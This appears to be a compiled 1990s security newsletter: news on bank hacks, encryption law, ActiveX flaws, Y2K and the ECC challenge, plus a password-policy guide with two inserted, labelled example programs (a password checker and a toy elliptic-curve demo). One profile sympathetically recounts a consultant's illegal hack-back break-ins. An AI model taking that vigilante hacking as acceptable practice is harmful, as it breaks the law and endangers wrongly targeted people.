As Czech reporters struggled to unravel the case, they were hindered by contradictory revelations from the police department and the bank. Early reports, attributed to an unnamed police source, carried full details of the alleged hack, saying that the bank's systems had indeed been penetrated, and that detectives had verified the authenticity of the data. But by the middle of last week, the police department was no longer answering questions, saying an information embargo had gone into effect on Sept. 15. The day before, the bank's general director had issued a statement saying that the hacks had never happened, and were merely an effort to discredit the state-run bank, which is gearing up for privatization. Then the bank, too, stopped commenting.

The International Chamber of Commerce, a body of companies and trade associations from 130 countries, says its anxiety about such cases is growing. As financial institutions around the world continue to bring services online, security measures become more imperative and more vulnerable than ever. According to Blue Sky Research in Paris, European Internet sites in particular are growing by large percentages. Blue Sky reported in July that the number of banking sites in Europe had grown from 863 in November 1998 to 1,845 by the following summer.

Pottengal Mukundan, the director of the ICC's Commercial Crime Services division, says the biggest complication is that banks don't want the world to know when a breach has occurred. "For the last couple of years we have been looking at this problem," Mukundan says. "We can't speak of examples, because this is a sensitive subject. Banks in particular don't wish these cases to be made public."

In response, Mukundan says the ICC is readying a special unit to tackle cybercrime. The unit will make its public debut in London at the end of the year, at the Alliance Against Cybercrime conference. The new department, he says, will allow companies to keep their worries private.
The unit hopes to solve cybercrimes without exposing banks to dangerous publicity. "Basically, we act as a club for our members so they can talk to us in confidence," Mukundan says. "Normally, in matters such as fraud, banks and insurance companies are very hesitant to talk to other banks. The idea in forming the [cybercrime] bureau is that they will feel a little more secure in telling us what their experiences are. We will then hold on to the information and pass it on to other [companies] without revealing the source." A similar approach, he adds, has worked in other industries like international shipping.

The ICC's closed-door plan holds particular appeal for banks in Eastern Europe and developing nations, according to Evan Neufeld, VP of international research at Forrester Research (FORR) in London. Competition, market regulation and law-enforcement agencies prevent banks in the U.S., Western Europe and developed Asia from hiding security breaches.

Implementing Security Measures
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So far we have talked about your risks, known exploits and bugs, and your policies or lack of them, but now we start to get into the meat of Internet and network security. It is now time to start implementing security measures on your system.

We are going to start with passwords. We begin here because (a) it is a pet peeve of mine that system and network passwords are so often badly managed, (b) this is the first and most important link in your security chain, and (c) it is a very easy place to start. This part of basic password policy I have gone over before, but it is so basic and so important that I feel that repeating it is worth it. Make your passwords secure by following certain rules. Here are some do's and don'ts:

Don't use the following for passwords:

  - Your first name.
  - Your last name.
  - Your login name.
  - Your pet's name.
  - Any name at all.
  - SS number.
  - House number.
  - Telephone number.
  - Your bank PIN.
  - Any password shorter than six characters.
Do:

  - Use passwords of six characters or more.
  - Use a combination of letters and numbers.
  - Use a combination of letters, numbers, and special characters.

What makes a password secure is the amount of complexity you have in creating the password. This complexity is not just to prevent someone from guessing what the password is, but also to thwart the efforts of crackers who use special cracking software to crack a password.

Password cracking programs work by using a dictionary of words to compare the passwords to. This means that any word at all can easily be discovered. Any word that can be found in a dictionary, no matter how obscure it may seem, can easily be revealed. Most password cracking programs, after using the dictionary approach, will then start using combinations of letters. A password that has what seems like a random sequence of pure letters is also easily cracked. I was able to crack the password "kgjhuy" in under two minutes. The next attack a password cracking program will use is a combination of letters and numbers. I was able to crack the password "jim1952" in under 10 minutes. Similarly the password "j1i9m52" took a couple of hours to crack. The password "jim&1*9!52#" has not been cracked yet after more than 12 hours. So the most secure password is one that is more than six characters long and is a combination of letters, numbers, and special characters that are intermixed within the password.

So now that you have set your password policy, it is time to enforce it. Just by telling everyone that their passwords must be six characters or more and contain a mix of letters, numbers, and special characters does not mean that they will do this. While doing a password audit once, I found that some people had no password, some used their login name as their password while others used the same letter or number six times. So how do you enforce password policy?

Windows NT gives you rudimentary tools for enforcing password policy.
If you open the User Manager For Domains (as administrator, of course), go to the menu "Policies" and choose "Account", you are presented with a properties page for passwords. Here you can set the password length, days until expiration, lockout retries and password history. Let me go over what each of these is for.

Minimum Password Length is somewhat self explanatory. You can set the value for the minimum length a password must be here. If you set it to 6, then each user in that domain must choose a password that is at least six characters long.

Days until expiration, or Maximum password age, allows you to set the length of time that will pass before a user has to change their password. In high security areas the maximum password age is set for 7 days or even as low as 1 day. For most people somewhere between 30-90 days will suffice.

Account lockout is so you can set the maximum number of retries a person has until that account is locked out. This prevents someone from trying to repeatedly guess a user's password. Don't set this number too low. Many administrators set this at 3 but I feel that this is too low. If you mess up on the first try, you only have two more tries before your account is locked. I would set this number to 5 or 6. This gives the user some fudge room while at the same time prevents password guessing by unauthorized individuals.

Password history, or Uniqueness, prevents the user from choosing the same password over and over. Unless you assign passwords to your users, do not set this value too high. If the user must always choose a completely new password every 30 days, they will run out of password ideas. This of course will make your job harder because the users will forget what the password was that they created, thus making you have to unlock their account several times a week.

Unfortunately, there is no way to specify that the user must have a mix of letters, numbers, and special characters from within Windows NT.
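The do's and don'ts above, and the audit findings (empty passwords, login name as password, one letter repeated six times), can be turned into an automated policy check. The script below is an added example and is not code from the article; the article suggests writing such a script in Perl, and this one uses Python instead. The function and constant names, the small stand-in dictionary and the audit list are constructed for the example. In practice the checker would run at password-change time or over the output of a password-quality review, never over a plain-text copy of the password store.

```python
"""Password-policy checker built from the rules in the article above
(added example, not the article's own code; names are my own)."""
import string

MIN_LENGTH = 6
SPECIALS = set(string.punctuation)

# Tiny stand-in for a cracking dictionary (constructed for the example).
SAMPLE_DICTIONARY = {
    "password", "secret", "letmein", "welcome", "dragon", "jim", "evergreen",
}


def check_password(password, username="", dictionary=SAMPLE_DICTIONARY,
                   personal=()):
    """Return a list of policy violations; an empty list means accepted.

    `personal` carries the strings the article says never to use: first
    and last name, pet's name, house or phone number, bank PIN, etc.
    """
    reasons = []
    pw = password or ""
    lower = pw.lower()

    if len(pw) < MIN_LENGTH:
        reasons.append("shorter than %d characters" % MIN_LENGTH)
    if pw and len(set(pw)) == 1:
        reasons.append("same character repeated")
    if username and lower == username.lower():
        reasons.append("equals login name")
    for item in personal:
        if item and lower == item.lower():
            reasons.append("matches personal data (%s)" % item)
    if pw.isdigit():
        reasons.append("digits only (SSN, phone, PIN style)")

    # Dictionary attack: the bare word, or a word with digits bolted on at
    # either end ("jim1952"). Specials intermixed inside the word defeat
    # this simple check, which is exactly what the article recommends.
    base = lower.strip(string.digits)
    if lower in dictionary:
        reasons.append("dictionary word")
    elif base != lower and base in dictionary:
        reasons.append("dictionary word with digits appended")

    has_letter = any(c.isalpha() for c in pw)
    has_digit = any(c.isdigit() for c in pw)
    has_special = any(c in SPECIALS for c in pw)
    if not (has_letter and has_digit and has_special):
        reasons.append("needs letters, numbers and special characters")
    return reasons


def audit(candidates, dictionary=SAMPLE_DICTIONARY):
    """Run check_password over (username, password) pairs and return a
    dict of username -> violation list for the accounts that fail."""
    failures = {}
    for user, pw in candidates:
        reasons = check_password(pw, user, dictionary)
        if reasons:
            failures[user] = reasons
    return failures


# Constructed audit data echoing the findings the article describes.
SAMPLE_CANDIDATES = [
    ("alice", ""),             # no password at all
    ("bob", "bob"),            # login name as password
    ("carol", "aaaaaa"),       # same letter six times
    ("dave", "kgjhuy"),        # random-looking letters only
    ("jim", "jim1952"),        # name plus digits
    ("erin", "j1i9m52"),       # letters and digits, no specials
    ("frank", "jim&1*9!52#"),  # letters, digits and specials intermixed
]

if __name__ == "__main__":
    for user, reasons in audit(SAMPLE_CANDIDATES).items():
        print("%-6s %s" % (user, "; ".join(reasons)))
```

Only the last candidate passes: it is the one form the article found uncrackable after 12 hours, and it is also the only one that defeats the "base word plus digits" check, because the specials sit inside the word rather than at its ends.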
For that kind of control you must use a third party software product. Products like "Password Appraiser" and "Password Policy Enforcer" let you set and enforce a strong password policy across the enterprise.

With Unix or Linux operating systems, the default password policy is very lax. In fact, you can set up a root account with no password at all if you wish. Of course this is different with different versions of Unix; some versions are more lax than others. You can set password policies rather easily in *nix with some simple scripts. If you are reasonably proficient in Perl, you can write a simple script that will specify password length, types of characters and password expiration without having to go out and buy a third party solution. If Perl is not your thing, I have provided a link below that has some sample scripts that you can use.

Another point to note is that many Unix password files are not very securely encrypted. It would not take much effort to crack the passwords in the passwd file. For this reason you might want to consider other measures to ensure strong password encryption. For Linux you can use the Password Shadow Suite. The Linux Shadow Password Suite gives you strong encryption of your passwd file that resists brute force cracking techniques.

Passwords are the first link in your security chain. If this link is weak, then your whole chain is broken and no combination of firewalls, proxies or other measures will keep your network secure. Focus on your passwords first and then you can add other security tools as you need them.

Activists Pull Stunt To Show Crypto Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The British Home Secretary has been sent a potentially incriminating e-mail by a pressure group trying to show that a draft e-commerce law could see innocent people falsely imprisoned.
Stand -- a group campaigning against controversial measures in the Electronic Communications Bill to govern the supply and use of encryption -- said on Monday it had sent Jack Straw an e-mail containing a confession to a crime. This had been encrypted with a key created in Straw's name and registered on international public key servers.

"The police may come and demand that you supply the key required to make this message intelligible," the letter said. "If you fail to do so, you would be committing an offense under the [Electronic Communications] Bill rendering you liable to imprisonment for up to two years.

"The fact that you don't possess this key won't help you unless you can prove that you don't have it. I wish you well in proving that it isn't hidden away on a disk in your secretary's home, or squirreled away on the Internet somewhere."

The group, supporting the view of lawyers who have spoken on the subject, argued the draft legislation would reverse the "innocent until proven guilty" principle. Last week, Nicholas Bohm of the Law Society told a conference the bill would reverse the burden of proof and breach the European Convention on Human Rights that protects against self-incrimination.

At the same Scrambling For Safety 3.5 conference, the new e-commerce minister Patricia Hewitt defended the Bill saying its requirements were no different than the police being able to develop a roll of film found in a defendant's home when searched. But Bohm argued the bill's powers were closer to the analogy of forcing the accused to develop a film themselves if it required special processing and the police could not develop it. In current law, suspects do not commit a crime if they decline to do this. He also used the analogy of a booby-trapped safe, where the contents could be destroyed if it was opened. The police could not currently force a suspect to deactivate any such privacy measures.
"Even if you can prove that you don't have it, you would still be liable for imprisonment unless you give information to the police that enables them to decrypt the key," the letter said. "Unfortunately for you, this is impossible, because we've destroyed all copies."

A Home Office spokeswoman said the department didn't believe the bill would reverse the burden of proof as the prosecution would still have to prove guilt beyond a reasonable doubt in all cases. She conceded that confusion may have arisen from putting specific defenses on the face of the Bill, such as: "If you don't have the key, but you give as much information as possible about how it could be obtained," she said.

Of the letter, the spokeswoman said people could be falsely incriminated in this way today without the Bill and without encryption being involved. "We think that's almost a red herring."

U.S., Network Solutions Reach Agreement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Internet address registrar Network Solutions and the U.S. Commerce Department have finally reached an agreement to offer competitors long-term access to the company's domain name database, a source familiar with the deal said Monday.

Following almost a year of negotiations, Herndon, Va.-based Network Solutions has agreed to let competing companies register new Internet addresses for a fee of $6 per year, well below the $35 per year Network Solutions charges its customers. The company will continue to manage the database of already registered names for at least four more years, under the agreement.

In essence, other companies will be able to compete for the "retail" business of registering new domain names, while Network Solutions will continue to run the "wholesale" business of keeping track of already registered names and informing Internet servers how to route traffic.
During an ongoing, several month "test" of competition, a handful of companies were allowed to register Internet address names into the Network Solutions database for a fee of $9 per name, per year.

Network Solutions has also agreed to be overseen, as its new competitors are, by the Internet Corporation for Assigned Names and Numbers (ICANN), a California nonprofit tapped last year by the Commerce Department to administer the domain name system. The agreement is to be announced at a Commerce Department press conference on Tuesday.

Under an agreement with the government that expired last year, Network Solutions was the only company permitted to register Internet domain names, the addresses of websites, e-mail, and other Net resources, that ended with the popular .com, .net and .org suffixes. But the Clinton administration decided to privatize the system, handing the reins over to ICANN last November and, earlier this year, letting firms compete with Network Solutions for the first time.

Since then, ICANN has struggled to get off the ground, running into criticism from Internet users and members of Congress for making decisions behind closed doors and proposing to fund itself with a fee of $1 per domain name. And Network Solutions battled the Commerce Department and Congress as it asserted ownership of the list of more than 5 million domain names it registered before the onset of competition.

On Monday, a spokesman for Network Solutions declined to comment. A spokesman for the Commerce Department said Secretary William Daley would make a statement on the domain name situation at Tuesday's press conference. Network Solutions stock rose 5 7/8 to 72 13/16 in trading of over 1.2 million shares on the Nasdaq on Monday.
CMGI to acquire free ISP 1stUp
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Internet holding company CMGI said today that it has agreed to buy free Internet service wholesaler 1stUp.com, in a move that solidifies the company's moves toward creating a full-service Web access and content powerhouse.

San Francisco-based 1stUp is the same company that provides CMGI affiliate AltaVista with its free ad-subsidized Internet access service, launched in August. The start-up also has signed a deal to provide its free service to Bolt.com, a teen-oriented Web portal.

The deal comes as CMGI has been moving to more closely integrate its various Web properties in hopes of taking on established Web players like Yahoo and America Online.

Microsoft - ActiveX Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~

Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators.

The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users transfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site. "The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month. Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk.

The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages. ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control.
With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities.

In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said. The controls in question are:

  - Kodak Image Edit (Wang Imaging)
  - Kodak Image Annotation (Wang Imaging)
  - Kodak Image Scan (Wang Imaging)
  - Kodak Thumbnail Image (Wang Imaging)
  - Wang Image Admin (Wang Imaging)
  - HHOpen (HTML help files)
  - Registration Wizard (Internet Explorer Product Registration)
  - IE Active Setup (Internet Explorer Setup)

Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems.

Privacy Groups Wary Of Encryption Reforms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Privacy groups and some lawmakers said Tuesday that they are concerned about legislation the Clinton administration has proposed that gives law enforcement potentially wider berth to access secure data to balance the relaxation of encryption-export controls.

Representatives from the Justice, Defense, and Commerce Departments and the White House briefed reporters and the Congressional Internet Caucus Advisory Committee, a bipartisan group of lawmakers, on the need to let law enforcement access encrypted material in criminal investigations.

The White House on Sept. 16 relaxed controls on data-scrambling products that are mass marketed to any country except those seven considered to support terrorism after a one-time technical review. The exact wording of the new regulation will be published by Dec. 15.
Industry praised the reforms because the about-face in the administration policy would let U.S. companies compete globally in strong encryption products. However, the reform package also includes draft legislation, the Cyberspace Electronic Security Act, that outlines when and how law enforcement may access secure data.

"We have deep concerns with the draft we've seen," said Jerry Berman, executive director of Center for Democracy and Technology, a privacy group here. The standards for court-ordered access to decryption keys and non-disclosure agreements protecting proprietary data gleaned in the course of investigations are ambiguous, he said. "The legislation should be written very clearly what sources and methods law enforcement and national security will use," Berman said.

The White House has sent the cyberspace security legislation to Capitol Hill and it can be introduced any time, he said. This legislation deserves many hearings and will originate in the Senate Judiciary Committee, Berman said.

The encryption reforms will move forward by Dec. 15 whether the controversial legislation has been passed or not, said Commerce Under Secretary William Reinsch, head of the Bureau of Export Administration.

Before the administration's lifting of encryption controls, legislation in the House of Representatives, the Security and Freedom Through Encryption, or SAFE Act, which would eliminate controls, was close to passage. "The administration's announcement doesn't let Congress off the hook. We still need legislation that provides permanent, significant guidelines for the FBI to get a key," said Sen. Patrick Leahy (D-Vt.), co-chair of the Internet caucus.

The author of the SAFE Act, Rep. Bob Goodlatte (R-Va.), said the bill, which enjoys broad congressional support, was ready for a full House vote. "Whether it goes depends on the details of the administration's rule," Goodlatte said.
The cyberspace security legislation will protect personal and industry privacy while also recognizing the serious problem of criminals hiding evidence, said Jim Robinson, Justice's assistant attorney general for the criminal division. The legislation gives special protections to those who deposit their decryption key with a third party, he said. "We will not let the public be left on the cutting floor," Robinson said.

Peter Swire, the White House chief counsel for privacy, called the cyberspace bill a tailored response to law enforcement. "We will get the rule down right," Swire said.

Wild Wild Web
~~~~~~~~~~~~~

Cybercrime units are overworked and understaffed, so many Netizens are taking matters into their own hands.

You're a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help - agencies are overworked and understaffed, and you risk public embarrassment if word gets out. Apparently, there's another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher.

"Lou" says he's spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace. Cipher, a pseudonym of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire. In the past 10 years, he says he's been hired over 50 times by big U.S. firms - mostly financial institutions - looking to get hackers off their back. He says fees now start at $100,000 for new clients, "with no promises of success."

He and his "associates" often take on their tasks by "bridging from the virtual world to the physical." That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit.
Cipher says he's even broken into homes and stolen hackers' computers to teach them a lesson. He gives the machines back after recovering any stolen information. "I am engaged in the protection and regaining of stolen assets because of the inability of government to provide adequate protection and prosecution," Cipher says. And that includes, he admits, breaking laws himself. His defense: "It's self-defense. You can call the FBI right now and say a person just got off with a database of customers. What is the FBI going to do?"

Giving Feds the fits

The increase in technology crime has given fits to law enforcement agencies who find they don't have the necessary skills to keep up with an army of new criminals, emboldened by the anonymity the Net provides. Even when federal agents act, justice can be slow. It took almost six months for the recent nationwide FBI hacker "crackdown" to produce an arrest. So Cipher, and some say other such corporate vigilantes, take the law into their own hands.

Still, to call breaking into someone else's home an act of corporate self-defense would likely be considered a stretch in court. "I don't see that argument holding water," said cyberlaw expert Dorsey Morrow. "It would be a dangerous thing for a corporation to do. The potential liability is incredible."

Particularly if vigilantes hit the wrong target. That's the concern of computer consultant Brian Martin, who maintains the popular hacker information site "attrition.org." "So Lou and his gang roll up on this house and know the intruder dialed from there. They bust in and terrorize an elderly couple. Oops!" Martin said. "How could they have been so wrong? Because the hacker used a laptop from the phone box outside their house. That scenario scares me."

First identified in a column

Cipher was first identified in public when information warfare expert Winn Schwartau used his name in a column for Network World in January.
Claims of baseball bat-wielding vigilantes stirred skepticism in the underworld, and neither Martin nor Space Rogue, who maintains the Hacker News Network Web site, say they've ever heard of a hacker being visited by any private security agent. "Considering the size of this community, if he has visited more than 10 people I am sure word would have leaked," Rogue said. But he added "There have been rumors floating around for a few years of corporations with their own internal security taking matters into their own hands."

That has law enforcement agencies anxious enough to discuss the matter publicly. Jim Christy, special agent for the Department of Defense, debated Schwartau on the topic at the Infowarcon conference earlier this month. "I have no problem with identifying a bad guy and warning them," said Christy, who for 11 years was chief of computer crime for the Air Force Office of Special Investigations. "That's a legitimate self-defense option for a victim. But it crosses the line when you violate the rights of others. ... It crosses the line when you break the law."

Rely on informants

He said the key to making law enforcement agencies more effective is for more victims of computer crime to come forward. Without a backlog of cases, agents can't demand additional resources. Companies that hire vigilantes, or who simply brush computer crime under the rug out of fear of embarrassment, only make the situation worse, he said.

But that won't help victims today, Schwartau said, and they need somewhere to turn. "The legal community says it's blatantly illegal," Schwartau said. Schwartau, who once shared ownership of a Web site venture with Cipher, says the legal community is being closed-minded on the topic. "Is disarming an adversary illegal? ... You're allowed to do repossession, which is stealing your own possessions back."

When MSNBC visited Cipher at his daytime consulting job, where he is a security adviser for a large U.S. brokerage company, Cipher said he painstakingly verifies his targets and admits sometimes he doesn't catch them. Most of the examples he offered involved pre-emptive strikes against hackers "probing" financial networks - the cyber equivalent of "casing" a bank before a robbery. Such pre-emptive strikes have taken him as far as Eastern Europe, and even India, he said. In one case, he said college-aged hackers in the Czech Republic were worming their way toward a bank's credit card database. Another incident involved hackers in India trying to fake an electronic funds transfer.

But sometimes, he said, he does his work entirely over the Internet. Last month he says his agents broke into the computer of a man who held a vast database of stolen credit cards. They scrambled the card numbers to render them useless. Many more of his stories are less dramatic, involving a polite curbside or coffeehouse conversation with a hacker. Often, that's enough, he says. "They are very surprised when we come to visit, when we bridge to the physical world," he said.

Desperate countdown to ready Cold War remnants for Y2K
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

All but one of the seven Cold War-era "hot lines" have year 2000 glitches, and the United States and Russia are hurrying to correct them, a top Pentagon official said today.

The Clinton administration is giving Moscow Y2K-compliant software and computers "to correct program deficiencies in outage reporting, monitoring, and channel reroute operations," assistant secretary of defense Edward Warner said. He made the remarks in testimony prepared for the Senate Special Committee on Y2K. The panel is studying pitfalls of the coding glitch that could cause ill-prepared computers--and the operations they control--to fail on January 1 with the changeover from 1999 to 2000.
To avoid possible misunderstandings during the date change, the United States and Russia agreed on September 13 to set up a joint "Center for Y2K Strategic Stability" at Peterson Air Force Base in Colorado Springs, Colorado.

Sharing information

In addition to sharing missile launch information, Russian and U.S. officers staffing the post will be able to talk through any other "defense-related problems that emerge" during the calendar rollover, Warner said. He said the Pentagon had begun the process of procuring updated equipment for the six of seven hot lines found to have problems, "and while the schedule is tight, we are confident that the fixes will be installed and tested by December."

"Assured communications between U.S. and Russian leaders is a priority at all times, and of particular concern over the millennium date change," said Warner, who is responsible for strategy and threat reduction. The United States and Russia each keep roughly 2,500 nuclear-tipped missiles pointed at one another on hair-trigger alert despite the collapse of the old Soviet Union in December 1991, ending the Cold War.

Immediate communication

They began installing the seven direct communications links, popularly known as hot lines, at the height of the Cold War in the 1960s to guarantee immediate communication when needed. Among these are: direct links between the two presidents; a link between the secretary of state and the foreign minister; and one connecting the nuclear risk-reduction centers on both sides. A secure communications link also is key to operations of the temporary Center for Y2K Strategic Stability.

Russia put on hold most Y2K-related fixes and other technical cooperation with the United States after U.S.-led NATO forces began a 78-day air war in March in Yugoslavia, a Russian ally. When talks resumed in August, Russia agreed with U.S. recommendations regarding "Y2K vulnerabilities in current hot line architecture," Warner said.
He said Y2K problems had been identified at a Russian ground station as well as in commercial software used on both sides, "which would prevent full operation of six of the seven direct communications links over the Y2K transition." Among the contingency plans now being discussed were the possible addition of "backup analog circuits, additional secure phone/facsimile capability, and installation of emergency INMARSAT (mobile satellite communications) devices on both sides," Warner said.

Critical issues

Another "critical" Y2K-related issue is the security of Russia's nuclear stockpiles, Warner told the committee headed by Utah Republican Robert Bennett and Connecticut Democrat Chris Dodd. "Of special concern are the security systems in nuclear storage sites affecting access control, perimeter monitoring, fire detection and suppression, and warhead inventory and accountability," he said. Forces of the 12th Main Directorate of the Russian Defense Ministry, responsible for the storage and security of non-deployed Russian nuclear warheads, are to maintain a "special Y2K monitoring and control center" at each of their 50 main nuclear storage sites from December through March 2000, Warner said.

Under its so-called Cooperative Threat Reduction program, the United States has spent millions of dollars since the end of the Cold War aimed at preventing Russian nuclear material from being purchased or stolen by guerrilla groups or third countries.

Computer wizards crack code in worldwide challenge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Computer wizards from 20 countries joined together to crack a high-powered secret code, winning a prestigious prize from a Canadian software firm seeking to establish a worldwide standard for encrypting data used in Internet transactions.
A team led by Robert Harley, of France's National Institute for Research in Computer Science and Control (INRIA), won the five-thousand-dollar award after a 40-day effort to solve the puzzle, the firm Certicom said Wednesday. Harley coordinated a mammoth calculating programme that occupied 195 researchers in 20 countries, using 740 computers to run 130,000 billion computations, it said in a press release received here.

The challenge centered on so-called "public key" cryptography. Under this, two computers that have never previously communicated agree on a joint key that will decipher coded data. The goal is to ensure that the key cannot be decoded, even if someone taps into the traffic -- thus ensuring that credit-card numbers and other data sent in electronic commerce cannot be intercepted and misused.

Certicom's challenge related to a logarithmic programme, called elliptic curve cryptography (ECC), that it hopes to have established as an Internet standard for encrypted codes. It contends that ECC, a newcomer to the field, is more secure than more widely-used rival concepts, uses up less computer memory and gobbles up less bandwidth in the communications link.

Specifically, cryptographers were asked to crack a 97-bit key that was encoded in ECC. Cracking it took twice as much computing power as cracking a 512-bit key in a rival encryption scheme made by RSA Data Security, Certicom said. The result also showed that "strong security" can be achieved only when a much more powerful key -- a minimum of 163 bits in ECC code -- is used, Certicom said.

The code-crackers included researchers in Australia, Austria, Britain and the United States. They have agreed to donate 4,000 dollars of the prize money to the Free Software Foundation, an organisation that encourages the creation of free software. The remaining 1,000 dollars will go to an Australian member of the team, Paul Bourke, who made the breakthrough in the calculation.
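As an added example (not code from the article or from Certicom), here is the key agreement the article describes, run on a textbook toy curve, followed by the brute-force discrete-log search that the challenge was about at 97-bit scale. The curve y^2 = x^3 + 2x + 2 over GF(17), the generator (5, 1) and the private scalars are assumed toy values.

```python
"""Toy elliptic-curve Diffie-Hellman plus a brute-force ECDLP solver.

Added example, not code from the article or from Certicom. The curve
y^2 = x^3 + 2x + 2 over GF(17) with generator G = (5, 1) is a textbook
toy curve whose group has prime order 19, chosen so the discrete log can
be recovered by exhaustive search in a few steps. The real challenge used
a 97-bit group, where the same search is infeasible.
"""
from typing import Optional, Tuple

P = 17            # field prime (toy value)
A, B = 2, 2       # curve coefficients: y^2 = x^3 + A*x + B (mod P)
G = (5, 1)        # generator point; its order is 19

Point = Optional[Tuple[int, int]]   # None represents the point at infinity


def on_curve(pt: Point) -> bool:
    """Check that a point satisfies the curve equation (infinity counts)."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P == 0


def ec_add(p1: Point, p2: Point) -> Point:
    """Group law: chord-and-tangent addition over GF(P)."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                      # p1 == -p2, result is infinity
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P   # tangent slope
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P          # chord slope
    x3 = (lam * lam - x1 - x2) % P
    y3 = (lam * (x1 - x3) - y1) % P
    return (x3, y3)


def scalar_mult(k: int, pt: Point) -> Point:
    """Double-and-add: compute k*pt. This is the 'easy' direction."""
    result: Point = None
    addend = pt
    while k > 0:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def point_order(pt: Point) -> int:
    """Smallest n > 0 with n*pt = infinity (fine for a toy group)."""
    n, acc = 1, pt
    while acc is not None:
        acc = ec_add(acc, pt)
        n += 1
    return n


def ecdh_shared_secret(my_priv: int, their_pub: Point) -> Point:
    """Each side multiplies the other's public point by its own private scalar."""
    return scalar_mult(my_priv, their_pub)


def brute_force_ecdlp(pub: Point, base: Point = G) -> int:
    """Recover k with k*base == pub by exhaustive search (the 'hard' direction).

    Exhaustive search needs up to n steps for a group of order n and only
    works for toy groups. Generic attacks such as Pollard rho need about
    sqrt(n) group operations; for the 97-bit challenge that is roughly 2^48,
    in line with the ~1.3e14 computations the article reports.
    """
    acc, k = base, 1
    while acc != pub:
        acc = ec_add(acc, base)
        k += 1
        if acc is None and pub is not None:
            raise ValueError("pub is not in the subgroup generated by base")
    return k


def demo() -> Tuple[int, int, Point]:
    """Run a key agreement, then recover Alice's key from her public point."""
    alice_priv, bob_priv = 5, 7            # constructed private scalars (< 19)
    alice_pub = scalar_mult(alice_priv, G)
    bob_pub = scalar_mult(bob_priv, G)
    s_alice = ecdh_shared_secret(alice_priv, bob_pub)
    s_bob = ecdh_shared_secret(bob_priv, alice_pub)
    assert s_alice == s_bob                # both sides derive the same point
    recovered = brute_force_ecdlp(alice_pub)
    return alice_priv, recovered, s_alice


if __name__ == "__main__":
    priv, recovered, shared = demo()
    print(f"shared secret {shared}; private key {priv} recovered as {recovered}")
```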
Bourke used computers at Australia's Swinburne University that are mainly used for studying pulsars.

U.S. finds malicious code changes in Y2K "fixes"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Malicious changes to computer code under the guise of Year 2000 software fixes have begun to surface in some U.S. work undertaken by foreign contractors, the top U.S. cybercop said yesterday. "We have some indications that this is happening" in a possible foreshadowing of economic and security headaches stemming from Y2K fixes, Michael Vatis of the Federal Bureau of Investigation told Reuters. Vatis heads the interagency National Infrastructure Protection Center (NIPC), responsible for detecting and deterring cyberattacks on networks that drive U.S. finance, transport, telecommunications, and other vital sectors.

A Central Intelligence Agency officer assigned to the NIPC said recently that India and Israel appeared to be the "most likely sources of malicious remediation" of U.S. software. "India and Israel appear to be the countries whose governments or industry may most likely use their access to implant malicious code in light of their assessed motive, opportunity, and means," the CIA officer, Terrill Maynard, wrote in the June issue of Infrastructure Protection Digest. A significant amount of Y2K repair is also being done for U.S. companies by contractors in Ireland, Pakistan, and the Philippines, according to Maynard. But they appear among the "least likely" providers to jeopardize U.S. corporate or government system integrity, although the possibility cannot be ruled out, he wrote.

Thousands of companies in the United States and elsewhere have contracted out system upgrades to cope with the anticipated Y2K glitch, which could scramble computers when 1999 gives way to 2000. The CIA declined to comment on Maynard's article. Referring to it, Vatis said, "This is our effort to [give] the public information that hopefully can be useful to people."
Vatis, interviewed at FBI headquarters, said that so far "not a great deal" of Y2K-related tampering had turned up. "But that's largely because, No. 1, we're really dependent on private companies to tell us if they're seeing malicious code being implanted in their systems," he said. In reporting evidence of possible Y2K-related sabotage of software, Vatis confirmed one of the worst long-term fears of U.S. national security planners. "A tremendous amount of remediation of software has been done overseas or by foreign companies operating within the United States," Vatis said.

